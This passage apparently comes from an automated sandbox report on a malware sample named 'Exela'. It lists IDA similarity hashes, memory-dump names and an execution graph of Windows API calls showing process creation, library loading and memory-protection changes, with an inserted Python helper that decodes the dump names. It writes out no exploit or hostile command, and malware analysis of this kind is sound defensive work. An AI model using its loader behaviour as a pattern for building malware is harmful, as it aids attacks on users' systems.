                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentDirectory
                                                                                                    • String ID: :
                                                                                                    • API String ID: 1611563598-336475711
                                                                                                    • Opcode ID: d6dc5ef3b9a701496246f0bbbe5215094a09db29d56a445c076fb19df1080212
                                                                                                    • Instruction ID: d0ca27f50b3d8d6ea6396d274946eb701d65cf6ee1a9dafadde8a1e0db84d645
                                                                                                    • Opcode Fuzzy Hash: d6dc5ef3b9a701496246f0bbbe5215094a09db29d56a445c076fb19df1080212
                                                                                                    • Instruction Fuzzy Hash: 72210932A0829182FB20BB11D05A17DB3B1FFC8B44FD98079D68C43694DF7CD94587A1
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFileHeaderRaise
                                                                                                    • String ID: csm
                                                                                                    • API String ID: 2573137834-1018135373
                                                                                                    • Opcode ID: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
                                                                                                    • Instruction ID: 67482ae86b62a841f54a4e3e387fac0227093d21e7b850cc28262326b72d379f
                                                                                                    • Opcode Fuzzy Hash: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
                                                                                                    • Instruction Fuzzy Hash: 1C115E32618B9582EB20AF19F440269B7E0FF88B98F984270DACD07755DF3CC951CB00
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DriveType_invalid_parameter_noinfo
                                                                                                    • String ID: :
                                                                                                    • API String ID: 2595371189-336475711
                                                                                                    • Opcode ID: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                                                                    • Instruction ID: 7bd18ae9e57faac16c5d06d74c4a4452f4b3837edea91fa4ba743aa71ec364a3
                                                                                                    • Opcode Fuzzy Hash: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                                                                    • Instruction Fuzzy Hash: 1201842291832786F721BF60A46B27EE3A0FF44704FC81175D54D46691DF2CE9048A24
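The memory-dump names listed under "Memory Dump Source" encode where each dump came from: the same process (0x4C = 76), the same module (index 0xC) and six regions at ascending bases with different page protections. As an added example (not part of the Joe Sandbox report), the following Python decodes the eight dot-separated fields of an .sdmp name, rebuilds the region map for the module and checks it against the IDA plugin snapshot name. The PAGE_* and MEM_IMAGE decodings are the winnt.h constants; the roles of fields 2, 3, 6 and 8 are assumptions inferred from the names on this page, not documented Joe Sandbox semantics.

```python
import re
from dataclasses import dataclass

# winnt.h memory-protection and region-type constants (exact values).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Eight dot-separated fields before ".sdmp". Field roles marked "assumed" are
# inferred from the names on this page, not from Joe Sandbox documentation.
SDMP_RE = re.compile(
    r"^([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.(\d+)\.([0-9A-Fa-f]{16})"
    r"\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp$"
)
# Snapshot names look like hcaresult_<pid>_<run>_<base>_<family>.jbxd (assumed layout).
SNAP_RE = re.compile(r"^hcaresult_(\d+)_(\d+)_([0-9A-Fa-f]+)_.+\.jbxd$")


@dataclass(frozen=True)
class Sdmp:
    pid: int          # field 1, hex process id (0x4C == 76 on this page)
    run: int          # field 2 (assumed: run index; the "_2_" in the snapshot name)
    seq: int          # field 3 (assumed: dump sequence number)
    base: int         # field 4, region base address
    protect: str      # field 5, decoded with the PAGE_* constants
    flag: int         # field 6 (assumed; meaning unknown, 0x1 on every dump here)
    mem_type: str     # field 7, decoded with the MEM_* constants (0x1000000 == MEM_IMAGE)
    module_idx: int   # field 8 (assumed: index of the module the region belongs to)


def parse_sdmp(name: str) -> Sdmp:
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError(f"not an sdmp name: {name}")
    pid, run, seq, base, prot, flag, mtype, idx = m.groups()
    prot_v, mtype_v = int(prot, 16), int(mtype, 16)
    return Sdmp(
        pid=int(pid, 16), run=int(run, 16), seq=int(seq), base=int(base, 16),
        protect=PAGE_PROTECT.get(prot_v & 0xFF, f"0x{prot_v:x}"),
        flag=int(flag, 16), mem_type=MEM_TYPE.get(mtype_v, f"0x{mtype_v:x}"),
        module_idx=int(idx, 16),
    )


def module_layout(names):
    """Source dump plus its 'Associated' dumps as an ascending (base, protect, type) map."""
    dumps = sorted((parse_sdmp(n) for n in names), key=lambda d: d.base)
    if len({(d.pid, d.run, d.module_idx) for d in dumps}) != 1:
        raise ValueError("dumps belong to different processes or modules")
    return [(d.base, d.protect, d.mem_type) for d in dumps]


def image_base(names) -> int:
    return module_layout(names)[0][0]


def snapshot_matches(snapshot: str, names) -> bool:
    """Check the IDA plugin snapshot name against the dumps it claims to cover."""
    m = SNAP_RE.match(snapshot)
    if not m:
        return False
    pid, run, base = int(m.group(1)), int(m.group(2)), int(m.group(3), 16)
    d = parse_sdmp(names[0])
    return (pid, run, base) == (d.pid, d.run, image_base(names))


# The six dump names listed for this module on the page.
DUMPS = [
    "0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp",
    "0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp",
    "0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp",
    "0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp",
    "0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp",
    "0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp",
]
SNAPSHOT = "hcaresult_76_2_7ff75ae90000_Exela.jbxd"

if __name__ == "__main__":
    for base, prot, mt in module_layout(DUMPS):
        print(f"{base:016x}  {prot:24} {mt}")
    print("snapshot consistent with dumps:", snapshot_matches(SNAPSHOT, DUMPS))
```

The layout this produces (read-only headers at the image base, one executable region at +0x1000, then read-only and read-write data regions) is what the disassembler snapshot is built from; a mismatch between the snapshot's pid/base and the dumps is the first thing to check before trusting cross-references from the "Similarity" entries.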

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:8.7%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:1.5%
                                                                                                    Total number of Nodes:536
                                                                                                    Total number of Limit Nodes:10
                                                                                                    execution_graph 10028 7ff75aea99d1 10029 7ff75aea99d6 10028->10029 10030 7ff75aea99fd GetModuleHandleW 10029->10030 10031 7ff75aea9a47 10029->10031 10030->10031 10032 7ff75aea9a0a 10030->10032 10032->10031 10491 7ff75aead3d0 10492 7ff75aead3e6 10491->10492 10495 7ff75aead3e2 10491->10495 10493 7ff75aead409 SetFilePointerEx 10492->10493 10492->10495 10494 7ff75aead423 GetFileSizeEx 10493->10494 10493->10495 10494->10495 10557 7ffb08032aaf 10558 7ffb08032ab4 IsProcessorFeaturePresent 10557->10558 10559 7ffb08032acc capture_previous_context 10558->10559 10380 7ffb081524be 10381 7ffb08394c90 IsProcessorFeaturePresent 10380->10381 10382 7ffb08394ca7 10381->10382 10383 7ffb08394caf capture_current_context 10381->10383 10382->10383 10384 7ffb08394d27 10383->10384 10496 7ff75aeaf3c8 10497 7ff75aeaf3e5 10496->10497 10500 7ff75aeaf408 10497->10500 10499 7ff75aeaf3ee 10501 7ff75aeaf434 10500->10501 10502 7ff75aeaf458 10501->10502 10503 7ff75aeaec08 HeapAlloc 10501->10503 10502->10499 10504 7ff75aeaf48b 10503->10504 10505 7ff75aeaa9b8 __free_lconv_mon 2 API calls 10504->10505 10505->10502 10363 7ffb084a3230 10364 7ffb084a3dd1 10363->10364 10371 7ffb084a3248 10363->10371 10365 7ffb084a3cde LoadLibraryA 10366 7ffb084a3cf8 10365->10366 10369 7ffb084a3d17 GetProcAddress 10366->10369 10366->10371 10368 7ffb084a3d39 VirtualProtect VirtualProtect 10368->10364 10369->10366 10370 7ffb084a3d2e 10369->10370 10371->10365 10371->10368 10372 7ff75ae9a34b 10374 7ff75ae9a351 10372->10374 10375 7ff75ae9ac06 10374->10375 10376 7ff75ae9be00 10374->10376 10377 7ff75ae9be23 10376->10377 10378 7ff75ae9be41 10376->10378 10379 7ff75aead66c HeapAlloc 10377->10379 10378->10375 10379->10378 10566 7ffb08031f7a 10567 7ffb080321d0 00007FFB2ADA1640 10566->10567 10568 7ffb08031f98 10567->10568 10506 7ff75aea1bc0 10507 7ff75aea1bf3 10506->10507 10509 7ff75aea1c5f 10507->10509 10510 7ff75aea0bf0 10507->10510 
10511 7ff75aea0c16 10510->10511 10512 7ff75aea0c27 10510->10512 10511->10509 10512->10511 10513 7ff75aead66c _fread_nolock HeapAlloc 10512->10513 10514 7ff75aea0c54 10513->10514 10515 7ff75aea0c68 10514->10515 10516 7ff75aeaa9b8 __free_lconv_mon 2 API calls 10514->10516 10517 7ff75aeaa9b8 __free_lconv_mon 2 API calls 10515->10517 10516->10515 10517->10511 10518 7ff75ae9cbc0 10519 7ff75ae9cbd0 10518->10519 10520 7ff75ae9cbd5 _set_fmode 10519->10520 10521 7ff75ae9cbe1 _RTC_Initialize 10520->10521 10385 7ff75aeab400 10386 7ff75aeab41f FlsGetValue 10385->10386 10387 7ff75aeab43a FlsSetValue 10385->10387 10388 7ff75aeab434 10386->10388 10389 7ff75aeab42c 10386->10389 10387->10389 10390 7ff75aeab447 10387->10390 10388->10387 10400 7ff75aeaec08 10390->10400 10392 7ff75aeab456 10393 7ff75aeab474 FlsSetValue 10392->10393 10394 7ff75aeab464 FlsSetValue 10392->10394 10395 7ff75aeab492 10393->10395 10396 7ff75aeab480 FlsSetValue 10393->10396 10397 7ff75aeab46d 10394->10397 10399 7ff75aeaa9b8 __free_lconv_mon 2 API calls 10395->10399 10396->10397 10398 7ff75aeaa9b8 __free_lconv_mon 2 API calls 10397->10398 10398->10389 10399->10389 10403 7ff75aeaec19 10400->10403 10401 7ff75aeaec4e HeapAlloc 10402 7ff75aeaec68 10401->10402 10401->10403 10402->10392 10403->10401 10403->10402 10193 7ff75aeac084 10194 7ff75aeac0db 10193->10194 10196 7ff75aeac0ad 10193->10196 10194->10196 10197 7ff75aeac1a4 10194->10197 10198 7ff75aeac1cb 10197->10198 10199 7ff75aeac1e2 SetFilePointerEx 10198->10199 10201 7ff75aeac1d1 10198->10201 10200 7ff75aeac1fa GetLastError 10199->10200 10199->10201 10200->10201 10201->10196 10522 7ff75aeb03c4 10523 7ff75aeb03e0 10522->10523 10524 7ff75aeb040f FlushFileBuffers 10523->10524 10525 7ff75aeb042b 10523->10525 10524->10525 10526 7ff75aeb041e GetLastError 10524->10526 10526->10525 10545 7ffb0815160e 10546 7ffb08394b70 IsProcessorFeaturePresent 10545->10546 10547 7ffb08394b88 10546->10547 10548 7ffb08394b8f capture_previous_context 10546->10548 10547->10548 10549 
7ffb08394c3d 10548->10549 10569 7ffb08031fa0 10572 7ffb08031fc0 00007FFB2ADB6570 10569->10572 10571 7ffb08031fb9 10573 7ffb08032006 00007FFB2ADB6570 10572->10573 10574 7ffb08033b8a 10572->10574 10578 7ffb08032024 10573->10578 10584 7ffb08032060 10573->10584 10590 7ffb08033f30 10574->10590 10577 7ffb08033f30 00007FFB2ADB6570 10579 7ffb08033bea 10577->10579 10578->10584 10585 7ffb08032110 10578->10585 10581 7ffb08033f30 00007FFB2ADB6570 10579->10581 10581->10584 10582 7ffb0803205c 10583 7ffb08032110 2 API calls 10582->10583 10582->10584 10583->10582 10584->10571 10586 7ffb080321d0 00007FFB2ADA1640 10585->10586 10588 7ffb08032153 10586->10588 10587 7ffb08032700 IsProcessorFeaturePresent 10589 7ffb080321ad 10587->10589 10588->10587 10589->10582 10591 7ffb08033f5c 10590->10591 10593 7ffb08033bc2 10590->10593 10592 7ffb08033f8d 00007FFB2ADB6570 10591->10592 10591->10593 10592->10591 10593->10577 10560 7ffb081532d3 __GSHandlerCheck 10561 7ffb08394a58 10560->10561 10564 7ffb081521ad __GSHandlerCheckCommon 10561->10564 10563 7ffb08394a6b 10564->10563 10565 7ffb08394a7c 10564->10565 10527 7ffb0803352a __scrt_dllmain_exception_filter 10404 7ffb080344a8 10405 7ffb080344c9 10404->10405 10406 7ffb080344ee 10404->10406 10406->10405 10408 7ffb08034598 10406->10408 10409 7ffb080345bf 10408->10409 10412 7ffb08032700 10409->10412 10411 7ffb080346f4 10411->10405 10413 7ffb08032709 10412->10413 10414 7ffb08032714 10413->10414 10415 7ffb08032ab4 IsProcessorFeaturePresent 10413->10415 10414->10411 10416 7ffb08032acc capture_previous_context 10415->10416 10416->10411 10417 7ff75aeb2bfc 10418 7ff75aeb2c05 10417->10418 10443 7ff75aeb2d00 10417->10443 10419 7ff75aeaa9b8 __free_lconv_mon 2 API calls 10418->10419 10421 7ff75aeb2c1f 10418->10421 10419->10421 10420 7ff75aeb2c31 10423 7ff75aeb2c43 10420->10423 10424 7ff75aeaa9b8 __free_lconv_mon 2 API calls 10420->10424 10421->10420 10422 7ff75aeaa9b8 __free_lconv_mon 2 API calls 10421->10422 10422->10420 10425 7ff75aeb2c55 10423->10425 10426 
7ff75aeaa9b8 __free_lconv_mon 2 API calls 10423->10426 10424->10423 10427 7ff75aeb2c67 10425->10427 10429 7ff75aeaa9b8 __free_lconv_mon 2 API calls 10425->10429 10426->10425 10428 7ff75aeb2c79 10427->10428 10430 7ff75aeaa9b8 __free_lconv_mon 2 API calls 10427->10430 10431 7ff75aeb2c8b 10428->10431 10432 7ff75aeaa9b8 __free_lconv_mon 2 API calls 10428->10432 10429->10427 10430->10428 10433 7ff75aeb2c9d 10431->10433 10434 7ff75aeaa9b8 __free_lconv_mon 2 API calls 10431->10434 10432->10431 10435 7ff75aeb2caf 10433->10435 10436 7ff75aeaa9b8 __free_lconv_mon 2 API calls 10433->10436 10434->10433 10437 7ff75aeb2cc1 10435->10437 10439 7ff75aeaa9b8 __free_lconv_mon 2 API calls 10435->10439 10436->10435 10438 7ff75aeb2cd6 10437->10438 10440 7ff75aeaa9b8 __free_lconv_mon 2 API calls 10437->10440 10441 7ff75aeb2ceb 10438->10441 10442 7ff75aeaa9b8 __free_lconv_mon 2 API calls 10438->10442 10439->10437 10440->10438 10441->10443 10444 7ff75aeaa9b8 __free_lconv_mon 2 API calls 10441->10444 10442->10441 10444->10443 10445 7ff75aea93fc 10446 7ff75aea9424 10445->10446 10447 7ff75aeaec08 HeapAlloc 10446->10447 10454 7ff75aea945f 10447->10454 10448 7ff75aeaa9b8 __free_lconv_mon 2 API calls 10449 7ff75aea946e 10448->10449 10450 7ff75aea94e1 10451 7ff75aeaa9b8 __free_lconv_mon 2 API calls 10450->10451 10451->10449 10452 7ff75aeaec08 HeapAlloc 10452->10454 10453 7ff75aea94d0 10456 7ff75aeaa9b8 __free_lconv_mon 2 API calls 10453->10456 10454->10450 10454->10452 10454->10453 10455 7ff75aea9504 10454->10455 10457 7ff75aeaa9b8 __free_lconv_mon 2 API calls 10454->10457 10458 7ff75aea9467 10454->10458 10456->10458 10457->10454 10458->10448 10528 7ffb08034da8 10530 7ffb08034dd1 10528->10530 10529 7ffb08034e00 10530->10529 10532 7ffb08034eec 10530->10532 10537 7ffb080321d0 10532->10537 10534 7ffb08034f22 10535 7ffb08032700 IsProcessorFeaturePresent 10534->10535 10536 7ffb08034f69 10535->10536 10536->10529 10538 7ffb080321fb 10537->10538 10540 7ffb0803222f 10537->10540 10538->10540 10541 
7ffb08034100 10538->10541 10540->10534 10540->10540 10544 7ffb080326d0 10541->10544 10543 7ffb08034126 00007FFB2ADA1640 10543->10540 10544->10543 10459 7ff75aeb9bf0 10460 7ff75aeb9c0c 10459->10460 10461 7ff75aeb9c23 10460->10461 10462 7ff75aeb9c10 _FindPESection 10460->10462 10462->10461 10211 7ff75ae9ccac 10212 7ff75ae9ccc0 10211->10212 10213 7ff75ae9cd0b 10212->10213 10214 7ff75ae9ccc8 __scrt_acquire_startup_lock 10212->10214 10214->10213 10216 7ff75ae9cce6 10214->10216 10215 7ff75ae9cd3c __scrt_release_startup_lock 10219 7ff75ae9cd48 10215->10219 10216->10213 10216->10215 10217 7ff75ae9cd91 __scrt_get_show_window_mode 10218 7ff75ae9cd9e 10217->10218 10221 7ff75ae91000 10218->10221 10219->10217 10222 7ff75ae91009 10221->10222 10256 7ff75ae936b0 10222->10256 10224 7ff75ae93804 10237 7ff75ae93808 10224->10237 10263 7ff75ae91950 10224->10263 10226 7ff75ae93825 10227 7ff75ae945b0 13 API calls 10226->10227 10240 7ff75ae9383c 10226->10240 10228 7ff75ae9392b 10227->10228 10228->10237 10281 7ff75ae97f80 10228->10281 10230 7ff75ae9395d 10231 7ff75ae93962 10230->10231 10233 7ff75ae93984 10230->10233 10232 7ff75aea00bc 4 API calls 10231->10232 10232->10237 10233->10233 10234 7ff75ae91950 30 API calls 10233->10234 10234->10240 10235 7ff75ae93dc4 10236 7ff75ae99400 2 API calls 10235->10236 10239 7ff75ae93dd7 SetDllDirectoryW 10236->10239 10237->10213 10238 7ff75ae93da7 SetDllDirectoryW LoadLibraryExW 10238->10235 10254 7ff75ae93e0a 10239->10254 10240->10235 10240->10237 10240->10238 10242 7ff75ae93ffc 10244 7ff75ae94006 PostMessageW GetMessageW 10242->10244 10245 7ff75ae94029 10242->10245 10243 7ff75ae93f1b 10285 7ff75ae933c0 10243->10285 10244->10245 10274 7ff75ae93360 10245->10274 10247 7ff75ae93f23 10247->10237 10248 7ff75ae93f2b 10247->10248 10250 7ff75ae93f41 PostMessageW GetMessageW 10248->10250 10251 7ff75ae93f64 10248->10251 10250->10251 10289 7ff75ae98bd0 10251->10289 10253 7ff75ae94039 10254->10242 10254->10243 10255 7ff75ae93f7f 10255->10237 10257 7ff75ae9c8c0 
10256->10257 10258 7ff75ae936bc GetModuleFileNameW 10257->10258 10259 7ff75ae93710 10258->10259 10260 7ff75ae936eb GetLastError 10258->10260 10325 7ff75ae992f0 FindFirstFileExW 10259->10325 10262 7ff75ae93706 10260->10262 10262->10224 10264 7ff75ae945b0 13 API calls 10263->10264 10265 7ff75ae91985 10264->10265 10266 7ff75ae91c43 10265->10266 10267 7ff75ae97f80 15 API calls 10265->10267 10266->10226 10269 7ff75ae919cb 10267->10269 10268 7ff75aea00bc 4 API calls 10268->10266 10270 7ff75aea040c _fread_nolock 15 API calls 10269->10270 10273 7ff75ae919e9 10269->10273 10271 7ff75ae91a20 10270->10271 10272 7ff75aea040c _fread_nolock 15 API calls 10271->10272 10271->10273 10272->10273 10273->10268 10328 7ff75ae96350 10274->10328 10276 7ff75ae9336e 10277 7ff75ae9338d 10276->10277 10339 7ff75ae964f0 10276->10339 10277->10253 10279 7ff75ae93381 10279->10277 10343 7ff75ae96040 10279->10343 10283 7ff75ae97fa4 10281->10283 10282 7ff75ae9807b 10282->10230 10283->10282 10284 7ff75aea040c _fread_nolock 15 API calls 10283->10284 10284->10283 10287 7ff75ae933ce 10285->10287 10286 7ff75ae94550 2 API calls 10286->10287 10287->10286 10288 7ff75ae935c7 10287->10288 10288->10247 10290 7ff75ae98bf0 10289->10290 10291 7ff75ae99400 2 API calls 10290->10291 10292 7ff75ae98c1d SetConsoleCtrlHandler GetStartupInfoW 10291->10292 10293 7ff75ae98c6a 10292->10293 10294 7ff75ae98cc0 GetCommandLineW CreateProcessW 10293->10294 10295 7ff75ae98d18 GetLastError 10294->10295 10296 7ff75ae98d3d RegisterClassW 10294->10296 10297 7ff75ae98d33 10295->10297 10298 7ff75ae98d81 CreateWindowExW 10296->10298 10299 7ff75ae98d7b GetLastError 10296->10299 10297->10255 10300 7ff75ae98ddf ShowWindow 10298->10300 10301 7ff75ae98dd7 GetLastError 10298->10301 10299->10298 10302 7ff75ae98dea WaitForSingleObject 10300->10302 10301->10302 10303 7ff75ae98e78 10302->10303 10304 7ff75ae98dfc 10302->10304 10305 7ff75ae98ec2 10303->10305 10306 7ff75ae98e81 WaitForSingleObject 10303->10306 10304->10306 10311 7ff75ae98e05 
GetLastError 10304->10311 10312 7ff75ae98e14 PeekMessageW 10304->10312 10309 7ff75ae98fb0 GetMessageW 10305->10309 10310 7ff75ae98ecf QueryPerformanceFrequency QueryPerformanceCounter 10305->10310 10307 7ff75ae98fe8 10306->10307 10308 7ff75ae98e97 TerminateProcess 10306->10308 10315 7ff75ae99001 GetExitCodeProcess CloseHandle CloseHandle 10307->10315 10316 7ff75ae98ff4 DestroyWindow 10307->10316 10317 7ff75ae98eaf WaitForSingleObject 10308->10317 10318 7ff75ae98ea9 GetLastError 10308->10318 10313 7ff75ae98f9b 10309->10313 10314 7ff75ae98fcb TranslateMessage DispatchMessageW 10309->10314 10319 7ff75ae98ef0 MsgWaitForMultipleObjects PeekMessageW 10310->10319 10311->10304 10320 7ff75ae98e33 TranslateMessage DispatchMessageW PeekMessageW 10312->10320 10321 7ff75ae98e66 WaitForSingleObject 10312->10321 10313->10307 10313->10309 10314->10313 10315->10297 10316->10315 10317->10307 10318->10317 10322 7ff75ae98f2a 10319->10322 10320->10320 10320->10321 10321->10303 10321->10304 10322->10309 10323 7ff75ae98f30 TranslateMessage DispatchMessageW PeekMessageW 10322->10323 10324 7ff75ae98f6c QueryPerformanceCounter 10322->10324 10323->10322 10323->10323 10324->10313 10324->10319 10326 7ff75ae9932f FindClose 10325->10326 10327 7ff75ae99342 10325->10327 10326->10327 10327->10262 10329 7ff75ae96365 10328->10329 10334 7ff75ae963aa 10329->10334 10347 7ff75ae94550 10329->10347 10331 7ff75ae9640d 10332 7ff75ae99070 3 API calls 10331->10332 10333 7ff75ae9641b 10331->10333 10332->10333 10333->10334 10351 7ff75ae99070 10333->10351 10334->10276 10336 7ff75ae96466 10336->10334 10337 7ff75ae99400 2 API calls 10336->10337 10338 7ff75ae9648a GetLastError 10337->10338 10338->10334 10340 7ff75ae96516 10339->10340 10342 7ff75ae9651e 10340->10342 10355 7ff75ae94d40 10340->10355 10342->10279 10344 7ff75ae96060 10343->10344 10344->10344 10345 7ff75ae96089 10344->10345 10346 7ff75ae91470 30 API calls 10344->10346 10345->10277 10346->10344 10348 7ff75ae9455a 10347->10348 10349 7ff75ae99400 2 API calls 
10348->10349 10350 7ff75ae9457f 10349->10350 10350->10331 10352 7ff75ae99400 2 API calls 10351->10352 10353 7ff75ae99084 LoadLibraryExW 10352->10353 10354 7ff75ae990a3 10353->10354 10354->10336 10356 7ff75ae94d55 10355->10356 10357 7ff75ae99400 2 API calls 10356->10357 10362 7ff75ae94e23 10356->10362 10358 7ff75ae94df6 10357->10358 10359 7ff75ae99400 2 API calls 10358->10359 10360 7ff75ae94e0d 10359->10360 10361 7ff75ae99400 2 API calls 10360->10361 10361->10362 10362->10342 10033 7ff75ae92fe0 10035 7ff75ae92ff0 10033->10035 10036 7ff75ae9302b 10035->10036 10037 7ff75ae91470 10035->10037 10048 7ff75ae945b0 10037->10048 10039 7ff75ae9149b 10039->10035 10040 7ff75ae91493 10040->10039 10041 7ff75ae91538 10040->10041 10046 7ff75ae9154b 10040->10046 10047 7ff75ae914d5 10040->10047 10056 7ff75ae91210 10041->10056 10045 7ff75ae915c4 10045->10035 10046->10047 10064 7ff75aea040c 10046->10064 10060 7ff75aea00bc 10047->10060 10049 7ff75ae945bc 10048->10049 10067 7ff75ae99400 10049->10067 10051 7ff75ae945e4 10052 7ff75ae99400 2 API calls 10051->10052 10053 7ff75ae945f7 10052->10053 10072 7ff75aea6004 10053->10072 10055 7ff75ae94606 10055->10040 10057 7ff75ae91268 10056->10057 10058 7ff75ae9126f 10057->10058 10059 7ff75aea040c _fread_nolock 15 API calls 10057->10059 10058->10047 10059->10057 10061 7ff75aea00ec 10060->10061 10108 7ff75ae9fe98 10061->10108 10063 7ff75aea0105 10063->10045 10135 7ff75aea042c 10064->10135 10066 7ff75aea0424 10066->10046 10068 7ff75ae99446 10067->10068 10069 7ff75ae99422 MultiByteToWideChar 10067->10069 10070 7ff75ae99463 MultiByteToWideChar 10068->10070 10071 7ff75ae9945c 10068->10071 10069->10068 10069->10071 10070->10071 10071->10051 10073 7ff75aea5f38 10072->10073 10074 7ff75aea5f5e 10073->10074 10076 7ff75aea5f91 10073->10076 10075 7ff75aea5f63 _invalid_parameter_noinfo 10074->10075 10077 7ff75aea5f6e 10075->10077 10076->10077 10079 7ff75aeaff3c 10076->10079 10077->10055 10080 7ff75aeaff62 10079->10080 10082 7ff75aeaff96 10080->10082 10083 
7ff75aeb6dc4 10080->10083 10082->10077 10086 7ff75aeb63c4 10083->10086 10085 7ff75aeb6df1 10085->10082 10087 7ff75aeb63f9 10086->10087 10088 7ff75aeb63db 10086->10088 10087->10088 10090 7ff75aeb6415 10087->10090 10089 7ff75aeb63e0 _invalid_parameter_noinfo 10088->10089 10092 7ff75aeb63ee 10089->10092 10093 7ff75aeb69d4 10090->10093 10092->10085 10094 7ff75aeb6a1b 10093->10094 10095 7ff75aeb6a86 CreateFileW 10094->10095 10096 7ff75aeb6a49 10094->10096 10097 7ff75aeb6b6c GetFileType 10095->10097 10100 7ff75aeb6af1 10095->10100 10096->10092 10098 7ff75aeb6b79 GetLastError 10097->10098 10104 7ff75aeb6bca 10097->10104 10101 7ff75aea4eec 10098->10101 10099 7ff75aeb6b39 GetLastError 10099->10096 10100->10099 10102 7ff75aeb6aff CreateFileW 10100->10102 10103 7ff75aeb6b88 CloseHandle 10101->10103 10102->10097 10102->10099 10103->10096 10107 7ff75aeb6bba 10103->10107 10104->10096 10105 7ff75aeb6d0c CloseHandle CreateFileW 10104->10105 10106 7ff75aeb6d53 GetLastError 10105->10106 10105->10107 10106->10107 10107->10096 10109 7ff75ae9fee1 10108->10109 10111 7ff75ae9feb3 10108->10111 10109->10111 10112 7ff75ae9ff14 10109->10112 10111->10063 10113 7ff75ae9ff2f 10112->10113 10114 7ff75ae9ff54 10112->10114 10113->10111 10114->10113 10118 7ff75aeaaa6c 10114->10118 10116 7ff75ae9ff83 10116->10113 10122 7ff75aeaa9b8 10116->10122 10119 7ff75aeaaa98 10118->10119 10121 7ff75aeaaa80 10118->10121 10119->10121 10126 7ff75aeaa9f4 10119->10126 10121->10116 10123 7ff75aeaa9e5 10122->10123 10124 7ff75aeaa9bd RtlFreeHeap 10122->10124 10123->10113 10124->10123 10125 7ff75aeaa9d8 GetLastError 10124->10125 10125->10123 10127 7ff75aeaaa10 10126->10127 10129 7ff75aeaaa45 10127->10129 10130 7ff75aeaabc8 10127->10130 10129->10121 10133 7ff75aeaabe4 10130->10133 10131 7ff75aeaac33 CloseHandle 10132 7ff75aeaac40 GetLastError 10131->10132 10134 7ff75aeaabea 10131->10134 10132->10134 10133->10131 10133->10134 10134->10129 10136 7ff75aea0456 10135->10136 10137 7ff75aea0485 10135->10137 10136->10137 10138 
